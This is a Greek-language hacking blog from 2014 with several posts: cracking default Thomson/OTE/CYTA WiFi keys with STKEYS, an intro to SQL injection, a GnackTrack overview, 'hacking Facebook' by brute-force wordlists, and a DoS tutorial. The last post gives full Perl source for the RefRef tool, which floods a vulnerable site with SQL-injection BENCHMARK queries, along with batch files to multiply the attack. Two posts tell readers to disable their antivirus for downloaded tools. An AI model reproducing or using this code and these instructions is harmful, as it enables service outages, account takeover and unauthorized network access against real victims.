Σάββατο 1 Μαρτίου 2014

Πως να σπασετε κωδικους Thomson,OTE και CYTA

18 σχόλια
Ο παρακάτω οδηγός λειτουργεί μόνο σε περίπτωση που ο ιδιοκτήτης δεν έχει αλλάξει το εργοστασιακό όνομα 
του δικτύου ( SSID ) ή τον εργοστασιακό κωδικό πρόσβασης , διαφορετικά χριαζόμαστε κάτι πιο εξιδικευμένο το οποίο απαιτεί και διάφορες επιδεξιότητες...

Το σπάσιμο ενώς εργοστασιακού κωδικού WIFI δεν χριάζεστε καμία απολύτως επιδεξιότητα, καθώς οαλγόριθμος που χρησιμοποιεί το εργοστάσιο για δώσει τους κωδικούς σχετίζεται με το όνομα. Έτσι γνωρίζοντας κάποιος το όνομα του δικτύου μπορεί πολύ εύκολα να βρεί και τον κωδικό πρόσβασης μιας και έχουν δημιουργηθεί πολλά προγράμματα που δίνοντας απλά το όνομα του δικτύου , παράγουν αυτόματα τον κωδικό πρόσβασης.



Σε περίπτωση που δεν υπάρχει σύνδεση στο διαδίκτυο η μέθοδος μπορεί να γίνει με κάποιο πρόγραμμα το οποίο έχετε κατεβάσει από πριν στον υπολογιστή , όπως το STKEYS.

1. Κατεβάστε το STKEYS από εδώ
2.Βεβαιωθείτε πως αν έχετε κάποιο firewall η αντιικό είναι είτε κλειστό είτε έχετε βάλει το πρόγραμμα στις εξαιρέσεις, έτσι ώστε να μπορεί να εκτελεστεί γιατι ειναι παρανομο το  wifi Hack

 ΚΑΛΑ αποτελεσματα...

Παρασκευή 28 Φεβρουαρίου 2014

Τι είναι η SQL Injection και τι μπορώ να κερδίσω με αυτή;

1 σχόλια


Η SQL Injection είναι μια επίθεση που χρησιμοποιείται σήμερα από πολλούς «hackers».

Με αυτή την επίθεση δίνεται η δυνατότητα σε κάποιον τρίτο να τρέξει sql εντολές και να πάρει ΠΟΛΥ σημαντικές πληροφορίες από την βάση δεδομένων στην οποία επιτίθεται. Η δυνατότητα αυτή οφείλεται στον λανθασμένο προγραμματισμένο κώδικα πολλών sites. (Bug). Πληροφορίες όπως κωδικοί πρόσβασης, ονόματα χρηστών,emails είναι ο κύριος στόχος των «Hackers» μέσω αυτής. Αν καταφέρουν και πάρουν αυτά τα στοιχεία τότε θα είναι πλέον σίγουρο πως το site την έχει βαμμένη. Θα το εξηγήσουμε βέβαια και παρακάτω πιο αναλυτικά και σε live παράδειγμα ώστε να δείτε πόσο μπορεί πραγματικά να πονέσει μια τέτοια τρύπα.


Πηγή http://www.p0wnbox.com

GnackTrack: Η Gnome έκδοση του BackTrack

0 σχόλια


To BackTrack είναι μια διανομη η οποία αν και πλέον έχει τη δυνατότητα εγκατάστασης στο σκληρό μας δίσκο, ξεκίνησε βασιζόμενη στη κατηγορία των: Auditing Live CDs.
Αυτά είναι μικρές διανομές εργαλεία που κατά κύριο λόγο μπορούν να χρησιμοποιηθούν για πάρα πολλούς σκοπούς, ένας εκ των οποίων είναι ο έλεγχος και η εξέταση της ασφάλειας ενός ή περισσοτέρων συστημάτων.
Το BackTrack είναι ένα τέτοιο ακριβός εργαλείο, το πιο δημοφιλές που υπάρχει τα εργαλεία που έχει είναι πολλά και ποικίλουν από τον έλεγχο κωδίκων που είναι ευάλωτοι, για ξένα μηχανήματα στο δίκτυο μας, για εντοπισμό wi-fi δικτύων και άλλα πολλά.

Για να μη τα επαναλαμβάνουμε, μπορειτε να δείτε μια αναλυτική παρουσίαση του μαι με επεξηγήσεις των σημαντικότερων εργαλείων που διαθέτει (δείτε το Ε Δ Ω).
Το BackTrack που τελευταία αποφάσισαν οι developers του να βασίζεται στο Ubuntu και φορώντας το KDE σαν γραφικό περιβαλλον.
Εμείς σήμερα θα δούμε την Gnome εκδοχή του, με τ’ όνομα: GnackTrack.
Μια πλήρης διανομη με όλα τα καθημερινά εργαλεία και εφαρμογές που επιπρόσθετα έχει ενσωματωμένα και τα φοβερά εργαλεία του BackTrack.
Έχει δυνατότητα εγκατάστασης, όμως πιστευω πως τέτοιου είδους διανομές αξιζει να τις τρέχουμε live από ένα usb.
Το γραφικό της περιβαλλον όταν πρωτοτρέξει είναι ένα κλασικό gnome desktop.
Έχει όλα τα εργαλεία του ταξινομημένα στο κεντρικό μενού, ωστε να υπάρχει εύκολη πρόσβαση και να μη χανόμαστε.
Είναι τόσα πολλά όμως που ειλικρινά κάποια στιγμη πελάγωσα με όλα αυτά που έχει μέσα.
Όπως και να έχει είναι ένα πληρέστατο εργαλείο που μπορεί να χρησιμοποιηθεί πολυποίκιλα μα σαφώς λύνει τα χέρια σε system administrators.
Σκοπός του άρθρου ήταν η γνωριμία με τη διανομη και σε καμία περίπτωση η αναλυτική παρουσίαση κάποιων εργαλείων της.
-Το GnackTrack μπορειτε να το κατεβασετε τόσο σαν iso, να το «κάψετε» σε καποιο usb η δισκάκι η να κατεβασετε το αρχείο του για virtual machines:

ΠΩΣ ΝΑ «ΧΑΚΑΡΕΤΕ» FACEBOOK..

1 σχόλια
Λοιπόν, επειδή βαρέθηκα να ακούω την φράση του τίτλου θα σας πω πως μπορείτε να το κάνετε αυτό συνοπτικά και στο μέλλον θα σας πω και άλλους τρόπους.Ο μόνος τρόπος να το κάνετε αυτό είναι με ένα bruteforce attack program που να υποστηρίζει πρωτόκολλο HTTP(form), single user και proxy.









(ΤΟ Προγράμμα  αυτο έχει  txt αρχεία -worlsists διάφορα username και passwords και δοκιμάζουν να βρουν τον κατάλληλο συνδυασμό) και αν ο φίλος σου χρησιμοποιεί κάποιο username και password που υπάρχει στους καταλόγους του προγράμματος (txt files) τότε θα είσαι τυχερός.



















                1. Κατεβάστε το  Attack_Program_STKEYS   από εδώ
2.Βεβαιωθείτε πως αν έχετε κάποιο firewall η αντιικό είναι είτε κλειστό είτε έχετε βάλει το πρόγραμμα στις εξαιρέσεις, έτσι ώστε να μπορεί να εκτελεστεί γιατι ειναι παρανομο το  Attack_Program ως Hack .
 ΚΑΛΑ αποτελεσματα...

DDoS Attack

0 σχόλια

Ετικέτες Hacking


 Στη σημερινή μας ανάρτηση θα δούμε πως να φτιάξετε και να επιτεθείτε σε ιστοσελίδες μέσω DDoS επίθεσης. Το πρόγραμμα αυτό είναι ένα απλό προγραμματάκι που κυκλοφόρησε από την ομάδα anonymous και κάνει επιθέσεις σε ιστοσελίδες που είναι τρωτές σε SQL Injection(οποιουδήποτε είδους).
*DDoS είναι πια επίθεση που υπερφορτώνει τον server με πολλά αιτήματα(επισκέψεις) σε σημείο να μην μπορεί να εξυπηρετήσει αυτούς που θέλουν να μπουν στην σελίδα με αποτέλεσμα να πέσει.
Ξεκινάμε! Πάμε στην επ. εργασίας μας και φτιάχνουμε έναν φάκελο με το όνομα refref. Μέσα φτιάχνουμε ένα έγγραφο κειμένου(.txt) και το ανοίγουμε με το σημειωματάριο. Μέσα στο σημειωματάριο αντιγράφουμε τον παρακάτω κώδικα(σε perl):


use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);


head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();


sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}


sub adios {
print "\n[+] Stoping attack\n";
copyright();
}


sub head {
print "\n\n-- == #RefRef == --\n\n";
}


sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}


sub sintax {
print "\n[+] Sintax : $0 \n";
}


sub toma {
return $nave->get($_[0]);
}


# ¿ The End ?
Μόλις το κάνετε αυτό θα πατήσετε αποθήκευση ως... και θα το σώσετε μέσα στον φάκελο που φτιάξατε με το όνομα refref.pl.(ΠΡΟΣΟΧΗ: Για να τρέξει καλά το πρόγραμμα θα χρειαστεί να κατεβάσετε αυτό το πρόγραμμα http://www.activestate.com/activeperl). Μόλις το κατεβάσετε το εικονίδιο αυτού που φτιάξαμε αντί για το άσπρο θα έχει αυτόματα ένα γαλάζιο του perl).
Συνεχίζουμε... Φτιάχνουμε άλλο ένα έγγραφο κειμένου και γράφουμε μέσα:
start /min test.bat
pause
boucle.bat
Και το αποθηκεύουμε μέσα στον φάκελο ως boocle.bat. Μέχρι τώρα έχουμε 2 αρχεία μέσα στον φάκελό μας. Πάμε να φτιάξουμε το τρίτο, και το τελευταίο! Ξανανοίγετε το σημειωματάριο και γράφετε μέσα:
Refref.pl http://www.xxx.xxx/xxx.php?xxx=xxx
test.bat
Και το αποθηκεύετε ως test.bat, και ΤΕΛΟΣ! Το πρόγραμμά μας είναι έτοιμο να τρέξει.
                                Πώς κάνουμε την επίθεση;
Πολύ απλά πηγαίνετε στον φάκελο test.bat και εκεί που εγώ γράφω "http://www.xxx.xxx/xxx.php?xxx=xxx" εσείς θα βάλετε την τρωτή ιστοσελίδα μαζί με το τρύπιο dork. Τέλος το αποθηκεύετε και τρέχετε το αρχείο boucle.bat. Θα σας βγει μια μαύρη οθόνη σαν την παρακάτω που θα σας λέει να πατήσετε ένα κουμπί. Π.χ αν κάθε φορά που θα πατάτε enter θα ανοίγει ένα παράθυρο cmd και θα τρέχει την επίθεση! Όσες περισσότερες φορές πατήσετε enter τόσο πιο ισχυρή θα γίνει η επίθεση! Βεβαιωθείτε μόνο για το πόσο δυνατές επιθέσεις αντέχει να κάνει ο υπολογιστής σας και ανοίξτε τον αντίστοιχο αριθμό παραθύρων.

 Πώς θα σταματήσετε την επίθεση;

Πολύ απλά θα πατήσετε σε όλα τα παράθυρα που εκτελούν την επίθεση CTRL+C και στη συνέχεια πατήστε yes για να σταματήσει η επίθεση.
Ακόμα η επίθεση θα γίνει στην ιστοσελίδα μέσω του τρύπιου dork σε όλη τη σελίδα και όχι μόνο στην τρύπια σελίδα που βάλαμε.